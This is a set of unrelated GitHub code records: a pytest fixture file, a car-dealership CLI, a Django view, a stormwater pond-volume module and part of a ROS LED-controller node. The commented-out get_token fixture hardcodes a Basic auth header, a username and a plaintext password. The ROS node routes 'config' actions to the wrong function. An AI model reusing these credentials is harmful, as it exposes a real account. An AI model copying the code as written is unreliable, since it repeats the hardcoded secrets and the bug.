\n    s.close()\n\n@pytest.fixture(scope=\"session\")\ndef set_excelData():\n    # 1 - path of the excel workbook\n    excelDir = '../data/TP_接口自动化测试用例V1.1.xls'\n    # 2 - open the excel workbook object -- formatting_info=True keeps the styles\n    workBook = xlrd.open_workbook(excelDir, formatting_info=True)\n    workBookNew = copy(workBook)  # copy it into a new excel workbook object\n    # workSheetNew = workBookNew.get_sheet(n)\n    # take the first sheet of the copied workbook object\n    workBookNew.save(r'../report/res.xls')\n    return workBookNew\n\n# @pytest.fixture(scope='session', autouse=True)  # runs for the whole package; scope sets the effective range\n# def get_token():\n#     login_url = f'{HOST}api/v1/sys/oauth/token'\n#     # 1. build the request headers\n#     header = {'Content-Type': 'application/x-www-form-urlencoded',\n#               'Authorization': 'Basic emhhbmppYW5nLXNzby10ZXN0OmFhYTQ0ZjI3LTc0MmYtNDMzMS05ZTA0LTllMDFmMGE1MmVjNg=='}\n#     # 2. build the request body: rule of thumb 2\n#     payload = {\"grant_type\":\"password\", \"username\":\"17688701458\", \"password\":\"Sutpc@2020\",\n#                \"cid\":\"dd7e5924-b5b4-4a0b-b269-66f11ef92b16\", \"scope\":\"all\", \"imageCode\":\"9527\"}\n#     # # 3. send the POST request\n#     r = requests.post(login_url, headers=header, data=payload)\n#     # print(r.json()['access_token'])\n#\n#     return r\n\n# @pytest.fixture(scope='session',autouse=True) # runs for the whole package; scope sets the effective range\n# def start_demo(request):# runs first when any test file under this package is executed\n#     print('---开始执行自动化测试---') # data preparation\n#\n#     # data cleanup: delete the garbage data generated by the tests\n#     def fin(): # data cleanup, equivalent to teardown\n#         print('---自动化测试---结束') # data cleanup\n#     request.addfinalizer(fin)\n\n# so can the environment setup be invoked manually by testers? --- yes\n# @pytest.fixture(scope='function')\n# def update_shop_init():# environment setup for updating a shop\n#     #1 - login --- setup_class --- already done in the class initialization, not needed here\n#     print('---我的作用是商铺更新的初始化操作---')\n#     #1 - login succeeded\n#     token = Login().login({\"username\":\"sq0777\",\"password\":\"xintian\"},getToken=True)\n#     #2 - list the shops -- id\n#     shopId=MyShop(token).shop_list({'page':1,'limit':20})['data']['records'][0]['id']\n#     #3 - file upload\n#     imageInfo = MyShop(token).file_upload('123.png','../data/123.png')\n#     return shopId,imageInfo# tuple type\n","repo_name":"kakashi-01/TP","sub_path":"TP_Api_Test/test_case/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36963439049","text":"from car import Carro, Motor\nfrom database import Database\n\n# Base class for the command line interface\nclass SimpleCLI:\n    def __init__(self):\n        self.commands = {}  # dictionary that stores the registered commands\n\n    # Method to add a command to the dictionary\n    def add_command(self, name, function):\n        self.commands[name] = function\n\n    # Method to run the command line interface\n    def run(self):\n        while True:\n            command = input(\"Enter a command: \")\n            if command == \"quit\":\n                print(\"Goodbye!\")\n                break\n            elif command in self.commands:\n                self.commands[command]()\n            else:
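\n                print(\"Invalid command. Try again.\")\n\n# a minimal usage sketch of SimpleCLI (hypothetical names, not part of this repo):\n#   cli = SimpleCLI()\n#   cli.add_command(\"hello\", lambda: print(\"hi\"))\n#   cli.run()  # dispatches \"hello\"; type \"quit\" to exit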
Try again.\")\n\n# Classe para a interface de linha de comando específica para carros\nclass CarCLI(SimpleCLI):\n def __init__(self, car_crud, concessionaria):\n super().__init__()\n self.car_crud = car_crud # Instância da classe CarCRUD\n self.concessionaria = concessionaria # Instância da classe Concessionaria\n # Adicionando comandos específicos para carros\n self.add_command(\"create\", self.create_car)\n self.add_command(\"read\", self.read_car)\n self.add_command(\"update\", self.update_car)\n self.add_command(\"delete\", self.delete_car)\n\n # Método para criar um carro\n def create_car(self):\n # Solicitando informações do carro ao usuário\n marca = input(\"Enter the car's brand: \")\n modelo = input(\"Enter the car's model: \")\n ano = int(input(\"Enter the car's year: \"))\n preco = float(input(\"Enter the car's price: \"))\n cor = input(\"Enter the car's color: \")\n tipo = input(\"Enter the motor's type: \")\n potencia = int(input(\"Enter the motor's power: \"))\n cavalos = int(input(\"Enter the motor's horsepower: \"))\n combustivel = input(\"Enter the motor's fuel type: \")\n \n # Criando instâncias de Motor e Carro\n motor = Motor(tipo, potencia, cavalos, combustivel)\n car = Carro(marca, modelo, ano, preco, cor, motor)\n \n # Adicionando o relacionamento com a concessionária\n car.concessionaria = self.concessionaria\n\n # Chamando o método create da classe CarCRUD\n self.car_crud.create(car)\n\n # Método para ler as informações de um carro\n def read_car(self):\n # Solicitando a marca e o modelo do carro ao usuário\n marca = input(\"Enter the car's brand: \")\n modelo = input(\"Enter the car's model: \")\n # Chamando o método read da classe CarCRUD\n car = self.car_crud.read(marca, modelo)\n if car:\n car.descricao() # Imprimindo a descrição do carro se ele for encontrado\n else:\n print(\"Car not found.\")\n\n # Método para atualizar as informações de um carro\n def update_car(self):\n # Solicitando a marca e o modelo do carro ao usuário\n marca = input(\"Enter the car's brand: \")\n modelo = input(\"Enter the car's model: \")\n # Chamando o método read da classe CarCRUD para encontrar o carro\n car = self.car_crud.read(marca, modelo)\n\n if car:\n print(\"Car found - CLI.\")\n # Solicitando as novas informações do carro ao usuário\n novo_modelo = input(\"Enter the car's new model: \")\n novo_ano = input(\"Enter the car's new year: \")\n novo_preco = input(\"Enter the car's new price: \")\n nova_cor = input(\"Enter the car's new color: \")\n novo_tipo = input(\"Enter the motor's new type: \")\n nova_potencia = input(\"Enter the motor's new power: \")\n novos_cavalos = input(\"Enter the motor's new horsepower: \")\n novo_combustivel = input(\"Enter the motor's new fuel type: \")\n\n # Atualizando as informações do carro\n car.modelo = novo_modelo if novo_modelo else car.modelo\n car.ano = int(novo_ano) if novo_ano else car.ano\n car.preco = float(novo_preco) if novo_preco else car.preco\n car.cor = nova_cor if nova_cor else car.cor\n car.motor.tipo = novo_tipo if novo_tipo else car.motor.tipo\n car.motor.potencia = int(nova_potencia) if nova_potencia else car.motor.potencia\n car.motor.cavalos = int(novos_cavalos) if novos_cavalos else car.motor.cavalos\n car.motor.combustivel = novo_combustivel if novo_combustivel else car.motor.combustivel\n\n # Chamando o método update da classe CarCRUD para atualizar o carro no banco de dados\n self.car_crud.update(marca, modelo, car) # Passar a marca e o modelo originais junto com o carro atualizado\n print(\"Car updated 
successfully.\")\n else:\n print(\"Car not found - CLI.\")\n\n # Método para deletar um carro\n def delete_car(self):\n # Solicitando a marca e o modelo do carro ao usuário\n marca = input(\"Enter the car's brand: \")\n modelo = input(\"Enter the car's model: \")\n # Chamando o método read da classe CarCRUD para encontrar o carro\n car = self.car_crud.read(marca, modelo)\n \n if car:\n # Chamando o método delete da classe CarCRUD para deletar o carro do banco de dados\n self.car_crud.delete(car.marca, car.modelo)\n print(\"Car deleted successfully.\")\n else:\n print(\"Car not found.\")\n\n # Método para executar a interface de linha de comando específica para carros\n def run(self):\n print(\"Welcome to Mr. Dito's Dealership - Administrator Panel\")\n print(\"To proceed, please enter a command:\")\n print(\"create, read, update, delete, quit\")\n super().run()","repo_name":"AlvaroLucioRibeiro/Final_Project_S202_2023","sub_path":"carCLI.py","file_name":"carCLI.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"682733860","text":"from django.shortcuts import render, redirect\nfrom person.models import About, Partner, Resume, Project\nfrom posts.models import Post\nfrom .forms import GetInTouchForm\nfrom .models import Service\n\n# Create your views here.\n\n\ndef home_view(request):\n obj = About.objects.order_by('-id')[:1]\n partner = Partner.objects.all()\n post = Post.objects.order_by('-id')\n form = GetInTouchForm(request.POST or None)\n q = request.GET.get('search')\n if q:\n post = post.filter(title__icontains=q)\n cat = request.GET.get('cat')\n if cat:\n post = post.filter(category__category__exact=cat)\n tag = request.GET.get('tag')\n if tag:\n post = post.filter(tag__tag__exact=tag)\n if form.is_valid():\n form.save()\n resume = Resume.objects.all()\n serves = Service.objects.all()\n projects = Project.objects.all()\n ctx = {\n 'objects': obj,\n 'partners': partner,\n 'posts': post,\n 'form': form,\n 'resume': resume,\n 'services': serves,\n 'projects': projects\n }\n return render(request, 'index.html', ctx)\n","repo_name":"Prince12Alimardon/Resume-site","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4015525502","text":"'''\r\n\r\nstage_depth is a local reference depth within an object\r\n\t-> all calc's are performed using this property\r\n\r\nelevation is an absolute reference between objects\r\n\t-> stage_depth is computed from elevation by subtracting start_stage_elevation\r\n\t-> all output is translated from stage_depth to elevation\r\n\t-> this is the primary io between the SSD object and all child objects\r\n\r\n'''\r\nimport math\r\nfrom sympy.solvers import solve\r\nfrom sympy import integrate, log, exp, oo, symbols\r\n\r\nimport Base\r\n\r\nif __name__ == '_ _main__':\r\n\tderivation_string = '''\r\n\t***** Storage Volume Derivation ******\r\n\r\n\tVolume = Integral(Length * Width, from=0, to=Height, WRT=Height)\r\n\t\twhere Length = bottom_length + Height * Slopes * 2\r\n\t'''\r\n\tprint(derivation_string)\r\n\t# Assumes Slope is uniform around the pond/vault:\r\n\tx,y,z,Slope = symbols(('x','y','z','Slope'))\r\n\r\n\tvolume = integrate((x + 2 * (Slope * z)) * (y + 2 * (Slope * z)),(z, 0, z))\r\n\r\n\tprint('Uniform side slopes: x = {0}, y = {1}, z = {2}, Slopes = {3}:1'.format(10,20,5,3))\r\n\tprint('Pond Volume 
=',volume, '\\nPond Volume =', volume.evalf(subs={x:10, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ty:20, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tz:5, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tSlope:3}) / 43560)\r\n\tprint()\r\n\r\n\t# Generalized form, all slopes are independent:\r\n\tx,y,z,slope_x_1, slope_x_2, slope_y_1, slope_y_2 = symbols(\r\n\t\t('x','y','z','slope_x_1',' slope_x_2',' slope_y_1',' slope_y_2'))\r\n\r\n\tvolume = integrate( (x + (slope_x_1 * z) + (slope_x_2 * z)) * \r\n\t\t\t\t\t\t(y + (slope_y_1 * z) + (slope_y_2 * z)),\r\n\t\t\t\t\t\t(z, 0, z))\r\n\tprint('Unique side slopes')\r\n\tprint('Pond Volume =',volume, '\\nPond Volume =', volume.evalf(subs={x:10, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\ty:20, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tz:5, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tslope_x_1:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tslope_x_2:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tslope_y_1:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tslope_y_2:3}) / 43560)\r\n\tprint()\t\t\t\t\t\t\t\t\t \r\n\r\n\r\n\t\t\r\n\t# Generalized form, all slopes are independent, length is a function of width:\r\n\tx,y,z,slope_x_1, slope_x_2, slope_y_1, slope_y_2, volume, len_to_width = symbols(\r\n\t\t('x','y','z','slope_x_1',' slope_x_2',' slope_y_1',' slope_y_2', 'volume', 'len_to_width'))\r\n\r\n\r\n\t# x == length\r\n\t# y == width\r\n\t# y = len_to_width * x\r\n\ty = x / len_to_width\r\n\r\n\t# Solve for width given a depth, volume, and side slopes (output is mostly usable because quadratic roots):\r\n\tanswer = solve(\tx*y*z + \r\n\t\t\tz**3*( slope_x_1*slope_y_1/3 + \r\n\t\t\t\t\tslope_x_1*slope_y_2/3 + \r\n\t\t\t\t\tslope_x_2*slope_y_1/3 + \r\n\t\t\t\t\tslope_x_2*slope_y_2/3) +\r\n\t\t\tz**2*( slope_x_1*y/2 + \r\n\t\t\t\t\tslope_x_2*y/2 + \r\n\t\t\t\t\tslope_y_1*x/2 + \r\n\t\t\t\t\tslope_y_2*x/2) - volume, x)\r\n\r\n\tprint(30*'#', 5*'\\n', answer[0], 5*'\\n', 30*'#')\r\n\t'''\r\n\t# Solve for depth given a width, volume, and side slopes (output is not very usable due to cubic roots)\r\n\tanswer_z = solve(\tx*y*z + \r\n\t\t\tz**3*( slope_x_1*slope_y_1/3 + \r\n\t\t\t\t\tslope_x_1*slope_y_2/3 + \r\n\t\t\t\t\tslope_x_2*slope_y_1/3 + \r\n\t\t\t\t\tslope_x_2*slope_y_2/3) +\r\n\t\t\tz**2*( slope_x_1*y/2 + \r\n\t\t\t\t\tslope_x_2*y/2 + \r\n\t\t\t\t\tslope_y_1*x/2 + \r\n\t\t\t\t\tslope_y_2*x/2) - volume, z)\r\n\t'''\r\n\r\n\r\n\tprint(30*'#' + 5*'\\n')\r\n\t_slope = 0\r\n\tltw = 1\r\n\troot_1 = answer[0].subs({\t\tslope_x_1:_slope,\r\n\t\t\t\t\t\t\t\t\tslope_x_2:_slope,\r\n\t\t\t\t\t\t\t\t\tslope_y_1:_slope,\r\n\t\t\t\t\t\t\t\t\tslope_y_2:_slope,\r\n\t\t\t\t\t\t\t\t\tz:1,\r\n\t\t\t\t\t\t\t\t\tlen_to_width:ltw,\r\n\t\t\t\t\t\t\t\t\tvolume:3600,\r\n\t\t\t\t\t\t\t\t\t})\r\n\r\n\r\n\tprint(5*'\\n', answer[0])\r\n\r\n\tprint(root_1, root_1.evalf(), root_1.evalf() / ltw)\r\n\tprint(5*'\\n' + 30*'#')\r\n\r\n\r\nclass RDStorage(Base.RDObject):\r\n\tdef __init__(self, *args, **kwargs):\r\n\t\tsuper().__init__(*args, **kwargs)\r\n\r\n\r\n\tdef volume_at_stage(self, stage_depth):\r\n\t\traise(Exception('You must define the \".volume_at_stage\" method in the subclass directly.'))\r\n\r\n\tdef stage_depth_with_volume(self, volume, precision = 0.1):\r\n\t\t'''\r\n\t\tThis returns the stage_depth at which the input volume is achieved to a given accuracy (default == 1e-5)\r\n\r\n\t\tThe solution complexity is log(n) via the bisection method\r\n\r\n\t\tPrecedure:\r\n\t\t\t1. Define upper and lower bounds\r\n\t\t\t\tupper = max_stage\r\n\t\t\t\tlower = 0\r\n\t\t\t2. 
Test if between initial bounds \r\n\t\t\t\tIf greater than upper: upper = upper * 2; repeat 2.;\r\n\t\t\t\tIf less than lower and lower = 0: raise error; \t\t\texit;\r\n\t\t\t\tSet middle initially\r\n\t\t\t\r\n\t\t\t3. Check precision\r\n\t\t\t\tIf good: break loop;\t\t\t\t\t\t\t\t\texit;\r\n\t\t\t\tLimit iteration;\r\n\t\t\t4. Test if greater than middle\r\n\t\t\t\tIf greater: lower = middle\r\n\t\t\t\tif not greater: upper = middle\r\n\t\t\t5. Find middle (avg(upper, lower)); repeat 3.;\r\n\t\t\t6. return middle\r\n\r\n\t\t'''\r\n\t\t# 1.\r\n\t\tupper_stage = self.max_depth\r\n\t\tlower_stage = 0\t\t# By Definition: Volume == 0\r\n\r\n\t\t# 2.\r\n\t\twhile self.volume_at_stage(upper_stage) < volume:\r\n\t\t\tupper_stage = upper_stage * 2\r\n\r\n\t\tif volume < 0:\r\n\t\t\traise(Exception('\\nVolume must be greater than 0.\\n'))\r\n\t\t\r\n\r\n\t\tmiddle_stage = (upper_stage + lower_stage) / 2 \r\n\r\n\t\t# 3.\r\n\t\titr = 0\r\n\t\twhile abs(volume - self.volume_at_stage(middle_stage)) > precision and itr < 100:\r\n\t\t\titr += 1\r\n\t\t\t\r\n\t\t\t# 4.\r\n\t\t\tif volume > self.volume_at_stage(middle_stage):\r\n\t\t\t\tlower_stage = middle_stage\r\n\t\t\telse:\r\n\t\t\t\tupper_stage = middle_stage\r\n\t\t\t\r\n\t\t\t# 5.\r\n\t\t\tmiddle_stage = (upper_stage + lower_stage) / 2\t\r\n\t\t\t\t\r\n\t\t# 6.\r\n\t\treturn middle_stage\r\n\r\n\r\n\r\nclass Pond(RDStorage):\r\n\tdef __init__(self, bottom_length = 0, \r\n\t\t\t\t\t\tbottom_width = 0, \r\n\t\t\t\t\t\tdepth = None, \r\n\t\t\t\t\t\tslope_width_1 = 3, \r\n\t\t\t\t\t\tslope_width_2 = 3, \r\n\t\t\t\t\t\tslope_length_1 = 3, \r\n\t\t\t\t\t\tslope_length_2 = 3,\r\n\t\t\t\t\t\tslope = None,\r\n\t\t\t\t\t\televation = 0,\r\n\t\t\t\t\t\tlen_to_width = 1,\r\n\t\t\t\t\t\tvolume = None,\r\n\t\t\t\t\t\t):\r\n\t\tsuper().__init__(elevation_bottom = elevation)\r\n\r\n\t\tself.x = bottom_width\r\n\t\tself.y = bottom_length\r\n\t\tself.z = depth\r\n\t\tself.len_to_width = len_to_width\r\n\t\tprint(slope)\r\n\t\tif slope != None:\r\n\t\t\tself.slope_width_1 = slope\r\n\t\t\tself.slope_width_2 = slope\r\n\t\t\tself.slope_length_1 = slope\r\n\t\t\tself.slope_length_2 = slope\r\n\t\telse:\r\n\t\t\tself.slope_width_1 = slope_width_1\r\n\t\t\tself.slope_width_2 = slope_width_2\r\n\t\t\tself.slope_length_1 = slope_length_1\r\n\t\t\tself.slope_length_2 = slope_length_2\r\n\t\t\r\n\t\tprint(self.slope_width_1)\r\n\t\tif volume and depth:\r\n\t\t\tself.set_len_and_width(volume = volume, depth = depth)\r\n\t\telse:\r\n\t\t\tself.volume_max = 0\r\n\r\n\t\tself.compute_max_volume()\r\n\t\r\n\tdef set_max_depth(self, depth):\r\n\t\tself.z = depth\r\n\r\n\t@property\r\n\tdef max_depth(self):\r\n\t\treturn self.z\r\n\r\n\tdef set_bottom_width(self, width):\r\n\t\tself.x = width\r\n\r\n\t@property\r\n\tdef bottom_width(self):\r\n\t\treturn self.x\r\n\r\n\tdef set_bottom_length(self, length):\r\n\t\tself.y = length\r\n\r\n\t@property\r\n\tdef bottom_length(self):\r\n\t\treturn self.y\r\n\t\r\n\tdef compute_max_volume(self):\r\n\t\tself.volume_max = self.volume_at_stage(self.max_depth)\r\n\t\r\n\tdef width_at_stage(self, stage_depth):\r\n\t\treturn self.bottom_width + (stage_depth * self.slope_width_1) + (stage_depth * self.slope_width_2)\r\n\t\r\n\tdef length_at_stage(self, stage_depth):\r\n\t\treturn self.bottom_length + (stage_depth * self.slope_length_1) + (stage_depth * self.slope_length_2)\r\n\t\r\n\tdef area_at_stage(self, stage_depth):\r\n\t\twidth = self.width_at_stage(stage_depth)\r\n\t\tlength = self.length_at_stage(stage_depth)\r\n\t\treturn length * 
width\r\n\t\t\r\n\tdef volume_at_stage(self, stage_depth):\r\n\t\t'''\r\n\t\t# # # # # # # # # # # # # # # # # # \r\n\t\t# Derivation of volume formula\r\n\t\t#\r\n\t\t\r\n\t\tfrom sympy import integrate, log, exp, oo, symbols\r\n\t\t\r\n\t\t# Generalized form, all slopes are independent:\r\n\t\tx,y,z,slope_x_1, slope_x_2, slope_y_1, slope_y_2 = symbols(\r\n\t\t\t('x','y','z','slope_x_1',' slope_x_2',' slope_y_1',' slope_y_2'))\r\n\t\t\r\n\t\tvolume = integrate( (x + (slope_x_1 * z) + (slope_x_2 * z)) * \r\n\t\t\t\t\t\t\t(y + (slope_y_1 * z) + (slope_y_2 * z)),\r\n\t\t\t\t\t\t\t(z, 0, z))\r\n\t\t\r\n\t\t# This is the output required for the class method below:\r\n\t\tprint(volume)\r\n\t\t\r\n\t \r\n\t\t\r\n\t\tprint(volume, '\\n', volume.evalf(subs={ x:10, \r\n\t\t\t\t\t\t\t\t\t\t\t\ty:20, \r\n\t\t\t\t\t\t\t\t\t\t\t\tz:5, \r\n\t\t\t\t\t\t\t\t\t\t\t\tslope_x_1:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\tslope_x_2:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\tslope_y_1:3, \r\n\t\t\t\t\t\t\t\t\t\t\t\tslope_y_2:3}) / 43560)\r\n\r\n\t\t'''\r\n\t\tx = self.bottom_width\r\n\t\ty = self.bottom_length\r\n\t\tz = stage_depth\r\n\t\tslope_x_1 = self.slope_width_1\r\n\t\tslope_x_2 = self.slope_width_2\r\n\t\tslope_y_1 = self.slope_length_1\r\n\t\tslope_y_2 = self.slope_length_2\r\n\t\t\r\n\t\treturn (\tx*y*z + \r\n\t\t\t\t\tz**3*( slope_x_1*slope_y_1/3 + \r\n\t\t\t\t\t\t\tslope_x_1*slope_y_2/3 + \r\n\t\t\t\t\t\t\tslope_x_2*slope_y_1/3 + \r\n\t\t\t\t\t\t\tslope_x_2*slope_y_2/3) +\r\n\t\t\t\t\tz**2*( slope_x_1*y/2 + \r\n\t\t\t\t\t\t\tslope_x_2*y/2 + \r\n\t\t\t\t\t\t\tslope_y_1*x/2 + \r\n\t\t\t\t\t\t\tslope_y_2*x/2)\r\n\t\t\t\t)\r\n\t\r\n\r\n\t@property\r\n\tdef elevation_at_max_stage(self):\r\n\t\treturn self.start_stage_elevation + self.max_depth\r\n\r\n\tdef length_at_elevation(self, elevation):\r\n\t\tstage_depth = elevation - self.start_stage_elevation\r\n\t\tif stage_depth >= 0:\r\n\t\t\treturn self.length_at_stage(stage_depth)\r\n\t\telse:\r\n\t\t\treturn 0\r\n\r\n\tdef width_at_elevation(self, elevation):\r\n\t\tstage_depth = elevation - self.start_stage_elevation\r\n\t\tif stage_depth >= 0:\r\n\t\t\treturn self.width_at_stage(stage_depth)\r\n\t\telse:\r\n\t\t\treturn 0\r\n\r\n\tdef volume_at_elevation(self, elevation):\r\n\t\tstage_depth = elevation - self.start_stage_elevation\r\n\t\tif stage_depth >= 0:\r\n\t\t\treturn self.volume_at_stage(stage_depth)\r\n\t\telse:\r\n\t\t\treturn 0\r\n\r\n\tdef set_len_and_width(self, volume = None, depth = None):\r\n\t\tlen_to_width = self.len_to_width\r\n\t\t\r\n\t\tif depth:\r\n\t\t\tz = depth\r\n\t\telse:\r\n\t\t\tz = self.max_depth\r\n\r\n\t\tif volume:\r\n\t\t\tvolume = volume\r\n\t\telse:\r\n\t\t\tvolume = self.volume_max\r\n\t\t\r\n\r\n\t\tslope_x_1 = self.slope_width_1\r\n\t\tslope_x_2 = self.slope_width_2\r\n\t\tslope_y_1 = self.slope_length_1\r\n\t\tslope_y_2 = self.slope_length_2\r\n\t\tlength =\t( -3 * z**2 * (len_to_width*slope_y_1 + len_to_width*slope_y_2 + slope_x_1 + slope_x_2) +\r\n\t\t\t\t\t \tmath.sqrt(3) *\r\n\t\t\t\t\t \tmath.sqrt( z * (\t3 *len_to_width**2*slope_y_1**2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t6 *len_to_width**2*slope_y_1*slope_y_2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t3 *len_to_width**2*slope_y_2**2*z**3 - \r\n\t\t\t\t\t\t\t\t\t\t\t10*len_to_width*slope_x_1*slope_y_1*z**3 - \r\n\t\t\t\t\t\t\t\t\t\t\t10*len_to_width*slope_x_1*slope_y_2*z**3 - \r\n\t\t\t\t\t\t\t\t\t\t\t10*len_to_width*slope_x_2*slope_y_1*z**3 - \r\n\t\t\t\t\t\t\t\t\t\t\t10*len_to_width*slope_x_2*slope_y_2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t48*len_to_width*volume + 
\r\n\t\t\t\t\t\t\t\t\t\t\t3*slope_x_1**2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t6*slope_x_1*slope_x_2*z**3 + \r\n\t\t\t\t\t\t\t\t\t\t\t3*slope_x_2**2*z**3)\r\n\t\t\t\t\t \t)\r\n\t\t\t\t\t) / (12*z) \r\n\t\twidth = length / self.len_to_width\r\n\r\n\t\tself.set_bottom_length(length)\r\n\t\tself.set_bottom_width(width)\r\n\t\tself.set_max_depth(depth)\r\n\t\tself.compute_max_volume()\r\n\r\n\t\r\n\r\n\t\t\r\n\r\n\r\nclass Pipe(RDStorage, Base.RDCircle):\r\n\tdef __init__(\tself, \r\n\t\t\t\t\televation, \t\t\t\t# Feet\r\n\t\t\t\t\tdiameter, \t\t\t\t# Feet\r\n\t\t\t\t\tlength, \t\t\t\t# Feet\r\n\t\t\t\t\tvoid_ratio = 0.33,\t\t# unitless, typically 0.33 for Perf. CMP systems, 0.00 for non-Perf. CMP\r\n\t\t\t\t\tperforated = True):\t\t\r\n\t\tsuper().__init__(elevation_bottom = elevation, diameter_ft = diameter)\r\n\t\tself.length = length\r\n\t\tself.perforated = perforated\r\n\t\tself.void_ratio_ag = void_ratio\r\n\t\tself.set_void_ratio_ag(void_ratio)\r\n\r\n\t\t\r\n\r\n\tdef set_void_ratio_ag(self, void_ratio):\r\n\t\tif not self.perforated:\r\n\t\t\tself.void_ratio_ag = 0\r\n\t\telse:\r\n\t\t\tself.void_ratio_ag = void_ratio\r\n\r\n\tdef volume_at_stage(self, stage_depth):\r\n\t\tpass\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\t\r\n\tpipe1 = Pipe(0, 1, 120)\r\n\r\n\r\n\t# Crude SSD output:\r\n\tp1 = Pond(143.26, 286.52, 10, 2,2,2,2)\r\n\t# p4 = Pond(len_to_width = 130/95,\r\n\t# \t\t\tdepth = 6,\r\n\t# \t\t\tslope = 3,\r\n\t# \t\t\tvolume = 100992)\r\n\t# p1 = p4\r\n\tinc = 10/90\r\n\tprint('Stage\\t', 'Area\\t', 'Volume\\t', 'Discharge')\r\n\tfor i in range(0, 93):\r\n\t\tstage = i * inc\r\n\t\tprint(round(stage, 3), '\\t', int(p1.area_at_stage(stage)) , '\\t', round(p1.volume_at_stage(stage)/43560, 4))\r\n\t\t\t\t\t\r\n\t\r\n\tp2 = Pond(\r\n\t\tbottom_length = 130, \r\n\t\tbottom_width = 55, \r\n\t\tdepth = 6, \r\n\t\tslope = 3)\r\n\t\r\n\tprint('Bottom area:', p2.area_at_stage(0), '\\nVolume at Riser Head:', p2.volume_at_stage(p2.z), 'cu ft',p2.volume_at_stage(p2.z)/ 43560)\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t\r\n\r\n\tp3 = Pond(\r\n\t\tbottom_length = 130, \r\n\t\tbottom_width = 95, \r\n\t\tdepth = 6, \r\n\t\tslope = 3)\r\n\t\r\n\tprint('Bottom area:', p3.area_at_stage(0), '\\nVolume at Riser Head:', p3.volume_at_stage(p3.z), 'cu ft',p3.volume_at_stage(p3.z)/ 43560)\t\r\n\t\t\t\t\t\r\n\r\n\tp4 = Pond(len_to_width = 130/95,\r\n\t\t\t\tdepth = 6,\r\n\t\t\t\tslope = 3,\r\n\t\t\t\tvolume = 100992)\r\n\t\t\t\t\t\r\n\tprint('Bottom area:', p4.area_at_stage(0), '\\nVolume at Riser Head:', p4.volume_at_stage(p4.z), 'cu ft',p4.volume_at_stage(p4.z)/ 43560)\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t\r\n\tp5 = Pond(len_to_width = 1, depth = 6, volume = 10000, slope = 0)\r\n\tprint(p5.stage_depth_with_volume(10001))\r\n\t\t\t\t\t\r\n\t\t\t\t\t","repo_name":"E-419/RainDrain","sub_path":"src/Storage.py","file_name":"Storage.py","file_ext":"py","file_size_in_byte":12278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2764503407","text":"#!/usr/bin/env python\n\n# Core ROS libs\nimport rospy\n\n# Controller lib\nfrom PCA9530_pkg.PCA9530_lib import PCA9530\n\n# Import ROS standard messages.\nfrom std_msgs.msg import String\n\n# JSON tool\nimport json\n\n# IMPORTANT #\n# See the node's README file for further details on what parameters the node expects.\n\n# Callback used to translate the received JSON message to an LED controller command.\n# Expecting something like this (example for the LED0 on command):\n# {\n# \"action\" : \"command\",\n# 
\"parameters\" : {\n# \"id\" : \"LED0\",\n# \"command\" : \"on\"\n# }\n# }\ndef messageCallback(message):\n try:\n # Unpack JSON message\n data = json.loads(message.data)\n \n # Execute the given action with its parameters.\n action = data['action']\n if action == \"command\":\n parameters = data['parameters']\n command(parameters['id'], parameters['command'])\n elif action == \"config\":\n parameters = data['parameters']\n command(parameters['id'], parameters['config'], parameters['value'])\n else:\n rospy.logerr(rospy.get_caller_id() + \": Unrecognized action \\\"%s\\\"\" % (action))\n except ValueError as e:\n rospy.logerr(rospy.get_caller_id() + \": Error decoding JSON \\\"%s\\\"\" % (str(e)))\n\n# Issue a command to the LED controller.\ndef command(id, command):\n if id == \"LED0\":\n ledID = PCA9530.LED0\n elif id == \"LED1\":\n ledID = PCA9530.LED1\n elif id == \"BOTH\":\n ledID = PCA9530.LED_BOTH\n else:\n rospy.logwarn(rospy.get_caller_id() + \" Unrecognized LED identifier \\\"%s\\\"\" % (id))\n return\n\n if command == \"on\":\n rospy.loginfo(rospy.get_caller_id() + \": Issuing \\\"on\\\" command on %s\" % (id))\n _controller.ledOn(ledID)\n elif command == \"off\":\n rospy.loginfo(rospy.get_caller_id() + \": Issuing \\\"off\\\" command on %s\" % (id))\n _controller.ledOff(ledID)\n elif command == \"blink0\":\n rospy.loginfo(rospy.get_caller_id() + \": Issuing \\\"blink0\\\" command on %s\" % (id))\n _controller.ledBlink0(ledID)\n elif command == \"blink1\":\n rospy.loginfo(rospy.get_caller_id() + \": Issuing \\\"blink1\\\" command on %s\" % (id))\n _controller.ledBlink1(ledID)\n else:\n rospy.logwarn(rospy.get_caller_id() + \": Unsupported command \\\"%s\\\"\" % (command))\n return\n\n# Configure a parameter of the LED controller.\ndef config(id, config, value):\n if id == \"BLINK0\":\n blinkID = PCA9530.BLINK0\n elif id == \"BLINK1\":\n blinkID = PCA9530.BLINK1\n else:\n rospy.logwarn(rospy.get_caller_id() + \" 